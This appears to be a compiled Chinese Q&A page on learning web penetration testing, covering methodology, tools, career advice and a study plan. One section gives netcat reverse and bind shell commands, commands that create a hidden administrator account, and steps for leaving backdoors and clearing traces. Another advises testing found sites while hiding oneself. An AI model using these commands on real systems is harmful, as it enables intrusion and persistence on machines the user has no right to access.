web安全滲透

A. 如何進行Web滲透測試

什麼是滲透測試？

滲透測試，是滲透測試工程師完全模擬黑客可能使用的攻擊技術和漏洞發現技術，對目標網路、主機、應用的安全作深入的探測，發現系統最脆弱的環節。

如何進行Web滲透測試？

完整web滲透測試框架當需要測試的web應用數以千計，就有必要建立一套完整的安全測試框架，流程的最高目標是要保證交付給客戶的安全測試服務質量。

1、立項：項目建立，時間安排，人力分配，目標制定，廠商介面人確定；

系統分析&威脅分析：針對具體的web應用，分析系統架構、使用的組件、對外提供的介面等，以STRIDE為威脅模型進行對應的安全威脅分析，輸出安全威脅分析表，重點關注top3威脅；

制定測試用例：根據威脅分析的結果制定對應的測試用例，測試用例按照模板輸出，具備可執行性；

測試執行&漏洞挖掘：測試用例執行&發散測試，挖掘對應的安全問題or漏洞；

問題修復&回歸測試：指導客戶應用開發方修復安全問題or漏洞，並進行回歸測試，確保安全問題or漏洞得到修復，並且沒有引入新的安全問題；

項目總結評審：項目過程總結，輸出文檔評審，相關文檔歸檔。

2、Web應用的滲透測試流程

主要分為3個階段，分別是：信息收集→漏洞發現→漏洞利用，下面仔細分析一下各個階段流程：

一、信息收集

在信息收集階段，我們需要盡量多的收集關於目標web應用的各種信息，比如：腳本語言的類型、伺服器的類型、目錄的結構、使用的開源軟體、資料庫類型、所有鏈接頁面，用到的框架等

腳本語言的類型：常見的腳本語言的類型包括：php、asp、aspx、jsp等

測試方法：

1 爬取網站所有鏈接，查看後綴

2 直接訪問一個不存在頁面後面加不同的後綴測試

3 查看robots.txt，查看後綴

伺服器的類型：常見的web伺服器包括：apache、tomcat、IIS、ngnix等

測試方法：

1 查看header，判斷伺服器類型

2 根據報錯信息判斷

3 根據默認頁面判斷

目錄的結構：了解更多的目錄，可能發現更多的弱點，如：目錄瀏覽、代碼泄漏等。

測試方法

1 使用字典枚舉目錄

2 使用爬蟲爬取整個網站，或者使用google等搜索引擎獲取

3 查看robots.txt是否泄漏

使用的開源軟體：我們如果知道了目標使用的開源軟體，我們可以查找相關的軟體的漏洞直接對網站進行測試。

測試方法

指紋識別（網路上有很多開源的指紋識別工具）

資料庫類型：對於不同的資料庫有不同的測試方法。

測試方法

1 使應用程序報錯，查看報錯信息

2 掃描伺服器的資料庫埠（沒做NAT且防火牆不過濾時有效）

所有鏈接頁面：這個跟前面的獲取目錄結構類似，但是這個不只是獲取網站的所有功能頁面，有時候還可以獲取到管理員備份的源碼。

測試方法

1 使用字典枚舉頁面

2 使用爬蟲爬取整個網站，或者使用google等搜索引擎獲取

3 查看robots.txt是否泄漏

用到的框架：很多網站都利用開源的框架來快速開發網站，所以收集網站的框架信息也是非常關鍵的。

測試方法

指紋識別（網路上有很多開源的指紋識別工具）

二、漏洞發現

在這個階段我們在做測試的時候要對症下葯，不能盲目的去掃描，首先要確定目標應用是否使用的是公開的開源軟體，開源框架等、然後在做深一度的漏洞掃描。

關於開源軟體的漏洞發現

開源的軟體：常見的開源軟體有wordpress、phpbb、dedecms等

開源的框架：常見的開源框架有Struts2、 Spring MVC、ThinkPHP等

中間件伺服器：常見的中間件伺服器有jboss、tomcat、Weblogic等

資料庫服務：常見的資料庫服務mssql、mysql、oracle、redis、sybase、MongoDB、DB2等

對於開源軟體的測試方法

1 通過指紋識別軟體判斷開源軟體的版本信息，針對不同的版本信息去開放的漏洞資料庫查找相應版本的漏洞進行測試

2 對於默認的後台登錄頁、資料庫服務埠認證等入口可以進行簡單的暴力破解、默認口令嘗試等操作

3 使用開源的漏洞發現工具對其進行漏洞掃描，如：WPScan

關於自主開發的應用

手動測試：這個階段，我們需要手工測試所有與用戶交互的功能，比如：留言、登入、下單、退出、退貨、付款等操作

軟體掃描：使用免費的軟體掃描，如：appscan、wvs、netsparker，burp等

可能存在的漏洞

Owasp關鍵點

代碼安全之上傳文件

代碼安全之文件包含

代碼安全之SSRF

邏輯漏洞之密碼重置

邏輯漏洞之支付漏洞

邏輯漏洞之越權訪問

平台安全之中間件安全

三、漏洞利用

針對不同的弱點有不同的漏洞利用方式，需要的知識點也比較多。一般這個階段包括兩種方式，一種是手工測試，一種是工具測試

手工測試

手工測試是通過客戶端或伺服器訪問目標服務，手工向目標程序發送特殊的數據，包括有效的和無效的輸入，觀察目標的狀態、對各種輸入的反應，根據結果來發現問題的漏洞檢測技術。手工測試不需要額外的輔助工具，可由測試者獨立完成，實現起來比較簡單。但這種方法高度依賴於測試者，需要測試者對目標比較了解。手工測試可用於Web應用程序、瀏覽器及其他需要用戶交互的程序。

這種方式對於有特殊過濾等操作，或者網路上沒有成型的利用工具的時候可以使用。

工具測試

網路上有很多好用的免費利用工具，比如針對sql注入的sqlmap、針對軟體漏洞的matesploit等。

B. web前端和web滲透有什麼區別

你是打錯了吧？這兩個東西怎麼會搭邊。

web前端是給用戶交互的界面
web滲透是你鑽別人網站伺服器里去

C. 我想問下學web安全這方面容易找工作嗎，就是滲透這方面

這方面還是可以的
因為企業個人網站越來越多
市場上
也沒有特別管用的安全防護軟體
一般差不多的公司
都會有網路安全管理人員
純手打
望採納

D. WEB伺服器安全滲透性測試方案

http://hi..com/zh2089/blog/category/%B1%BE%C8%CB%D4%AD%B4%B4
本人博客的幾篇原創文章，裡面有一些實例，LZ覺得可以的話請給最佳答案

E. 如何系統學習web安全，web滲透測試

首先得清楚web安全/web滲透是什麼：模擬黑客攻擊，利用黑客技術，挖掘漏洞，提出修復建議。

涉及到的技術有：資料庫/網路技術/編程技術/操作系統/滲透技術/攻防技術/逆向技術/SRC漏洞平台/ctf經驗。。

崗位能力要求：

1、熟練使用awvs、nessus、metasploit、burpsuite等安全測試工具，並對其原理有一定了解

2、熟悉OWASP中常見的web安全漏洞、業務邏輯漏洞及其原理

3、熟悉滲透測試技術的整體流程，具備獨立開展滲透工作的能力；

4、熟悉linux系統操作，了解常見web中間件、資料庫、伺服器相關漏洞

5、至少掌握一種編程語言，能夠開發用於輔助日常工作的腳本

6、具備一定的php或java代碼審計能力，能夠對公開漏洞進行分析

7、具備良好的邏輯思維、溝通技巧及團隊協作能力

8、已取得信息安全等級測評師證書的優先。（NISP）

想要系統的學習web滲透，可以參考企業對人才的要求進行學習。

F. 本人信息安全大一新生，想走web安全的滲透路線，需要完成什麼知識儲備希望前輩給點建議，謝謝。

作者：向生李
鏈接：https://www.hu.com/question/21914899/answer/39344435
來源：知乎
著作權歸作者所有。商業轉載請聯系作者獲得授權，非商業轉載請註明出處。

Web安全工程師

• Web安全相關概念
  熟悉基本概念（SQL注入、上傳、XSS、CSRF、一句話木馬等）。
  

• 通過關鍵字（SQL注入、上傳、XSS、CSRF、一句話木馬等）進行Google/SecWiki；

• 閱讀《精通腳本黑客》，雖然很舊也有錯誤，但是入門還是可以的；

• 看一些滲透筆記/視頻，了解滲透實戰的整個過程，可以Google（滲透筆記、滲透過程、入侵過程等）；

• 3周
  
  熟悉滲透相關工具
  熟悉AWVS、sqlmap、Burp、nessus、chopper、nmap、Appscan等相關工具的使用。
  

• 了解該類工具的用途和使用場景，先用軟體名字Google/SecWiki；

• 下載無後們版的這些軟體進行安裝；

• 學習並進行使用，具體教材可以在SecWiki上搜索，例如：Brup的教程、sqlmap；

• 待常用的這幾個軟體都學會了可以安裝音速啟動做一個滲透工具箱；

• 5周
  
  滲透實戰操作
  掌握滲透的整個階段並能夠獨立滲透小型站點。
  

• 網上找滲透視頻看並思考其中的思路和原理，關鍵字（滲透、SQL注入視頻、文件上傳入侵、資料庫備份、dedecms漏洞利用等等）；

• 自己找站點/搭建測試環境進行測試，記住請隱藏好你自己；

• 思考滲透主要分為幾個階段，每個階段需要做那些工作，例如這個：PTES滲透測試執行標准；

• 研究SQL注入的種類、注入原理、手動注入技巧；

• 研究文件上傳的原理，如何進行截斷、雙重後綴欺騙(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，參照：上傳攻擊框架；

• 研究XSS形成的原理和種類，具體學習方法可以Google/SecWiki，可以參考：XSS；

• 研究Windows/Linux提權的方法和具體使用，可以參考：提權；

• 可以參考: 開源滲透測試脆弱系統；

• 1周
  
  關注安全圈動態
  關注安全圈的最新漏洞、安全事件與技術文章。
  

• 通過SecWiki瀏覽每日的安全技術文章/事件；

• 通過Weibo/twitter關注安全圈的從業人員（遇到大牛的關注或者好友果斷關注），天天抽時間刷一下；

• 通過feedly/鮮果訂閱國內外安全技術博客（不要僅限於國內，平時多注意積累），沒有訂閱源的可以看一下SecWiki的聚合欄目；

• 養成習慣，每天主動提交安全技術文章鏈接到SecWiki進行積淀；

• 多關注下最新漏洞列表，推薦幾個：exploit-db、CVE中文庫、Wooyun等，遇到公開的漏洞都去實踐下。

• 關注國內國際上的安全會議的議題或者錄像，推薦SecWiki-Conference。

• 3周
  
  熟悉Windows/Kali Linux
  學習Windows/Kali Linux基本命令、常用工具；
  

• 熟悉Windows下的常用的cmd命令，例如：ipconfig,nslookup,tracert,net,tasklist,taskkill等；

• 熟悉Linux下的常用命令，例如：ifconfig,ls,cp,mv,vi,wget,service,sudo等；

• 熟悉Kali Linux系統下的常用工具，可以參考SecWiki,《Web Penetration Testing with Kali Linux》、《Hacking with Kali》等；

• 熟悉metasploit工具，可以參考SecWiki、《Metasploit滲透測試指南》。

• 3周
  
  伺服器安全配置
  學習伺服器環境配置，並能通過思考發現配置存在的安全問題。
  

• Windows2003/2008環境下的IIS配置，特別注意配置安全和運行許可權，可以參考：SecWiki-配置；

• Linux環境下的LAMP的安全配置，主要考慮運行許可權、跨目錄、文件夾許可權等，可以參考：SecWiki-配置；

• 遠程系統加固，限制用戶名和口令登陸，通過iptables限制埠；

• 配置軟體Waf加強系統安全，在伺服器配置mod_security等系統，參見SecWiki-ModSecurity；

• 通過Nessus軟體對配置環境進行安全檢測，發現未知安全威脅。

• 4周
  
  腳本編程學習
  選擇腳本語言Perl/Python/PHP/Go/Java中的一種，對常用庫進行編程學習。
  

• 搭建開發環境和選擇IDE，PHP環境推薦Wamp和XAMPP，IDE強烈推薦Sublime，一些Sublime的技巧：SecWiki-Sublime；

• Python編程學習，學習內容包含：語法、正則、文件、網路、多線程等常用庫，推薦《Python核心編程》，不要看完；

• 用Python編寫漏洞的exp，然後寫一個簡單的網路爬蟲，可參見SecWiki-爬蟲、視頻；

• PHP基本語法學習並書寫一個簡單的博客系統，參見《PHP與MySQL程序設計（第4版）》、視頻；

• 熟悉MVC架構，並試著學習一個PHP框架或者Python框架（可選）；

• 了解Bootstrap的布局或者CSS，可以參考：SecWiki-Bootstrap;

• 3周
  
  源碼審計與漏洞分析
  能獨立分析腳本源碼程序並發現安全問題。
  

• 熟悉源碼審計的動態和靜態方法，並知道如何去分析程序，參見SecWiki-審計；

• 從Wooyun上尋找開源程序的漏洞進行分析並試著自己分析；

• 了解Web漏洞的形成原因，然後通過關鍵字進行查找分析，參見SecWiki-代碼審計、高級PHP應用程序漏洞審核技術；

• 研究Web漏洞形成原理和如何從源碼層面避免該類漏洞，並整理成checklist。
  

• 5周
  
  安全體系設計與開發
  能建立自己的安全體系，並能提出一些安全建議或者系統架構。
  

• 開發一些實用的安全小工具並開源，體現個人實力；

• 建立自己的安全體系，對公司安全有自己的一些認識和見解；

• 提出或者加入大型安全系統的架構或者開發；

• 看自己發展咯~

G. web滲透是什麼

Web滲透測試分為白盒測試和黑盒測試，白盒測試是指目標網站的源碼等信息的情況下對其滲透，相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透，以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個步驟，信息收集，漏洞掃描，漏洞利用，提權，內網滲透，留後門，清理痕跡。一般的滲透思路就是看是否有注入漏洞，然後注入得到後台管理員賬號密碼，登錄後台，上傳小馬，再通過小馬上傳大馬，提權，內網轉發，進行內網滲透，掃描內網c段存活主機及開放埠，看其主機有無可利用漏洞（nessus）埠（nmap）對應服務及可能存在的漏洞，對其利用（msf）拿下內網，留下後門，清理痕跡。或者看是否有上傳文件的地方，上傳一句話木馬，再用菜刀鏈接，拿到資料庫並可執行cmd命令，可繼續上大馬.........思路很多，很多時候成不成功可能就是一個思路的問題，技術可以不高，思路一定得騷。

信息收集

信息收集是整個流程的重中之重，前期信息收集的越多，Web滲透的成功率就越高。

DNS域名信息：通過url獲取其真實ip,子域名(Layer子域名爆破機)，旁站(K8旁站，御劍1.5)，c段，網站負責人及其信息（whois查詢）

整站信息：伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型；

網站常見搭配為：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目錄信息（御劍，dirbust）

開放埠信息（nmp）

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描，看其是否有可利用漏洞。

常見漏洞：

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實體注入)漏洞

SSRF(服務端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠程代碼執行漏洞

CORS跨域資源共享漏洞

越權訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什麼也好對相應漏洞進行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

後台密碼爆破（burp）

埠爆破（hydra）

提權

獲得shell之後我們許可權可能很低，因此要對自己提權，可以根據伺服器版本對應的exp進行提權，對於Windows系統也可看其補丁對應漏洞的exp進行提權

內網滲透

首先進行埠轉發可用nc

nc使用方法：

反向連接

在公網主機上進行監聽：

nc-lvp 4444

在內網主機上執行：

nc-e cmd.exe 公網主機ip4444

成功之後即可得到一個內網主機shell

正向連接

遠程主機上執行：

nc-l -p 4444 -t -e cmd.exe

本地主機上執行：

nc-vv 遠程主機ip4444

成功後，本地主機即可遠程主機的一個shell

然後就是對內網進行滲透了，可以用主機漏洞掃描工具（nessus,x-scan等）進行掃描看是否有可用漏洞，可用msf進行利用，或者用nmap掃描存活主機及開放埠，可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門

留後門

對於網站上傳一句話木馬，留下後門

對於windows用戶可用hideadmin創建一個超級隱藏賬戶

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到，但在控制面板可以看到，還需要改注冊表才能實現控製版面也看不到，太過麻煩，不多贅述，所以還是用工具省心省力。

H. 在web安全滲透中黑客在攻擊後需要完成的工作有

摘要 https://blog.csdn.net/qq_36659627/article/details/85240092?locationNum=11&fps=1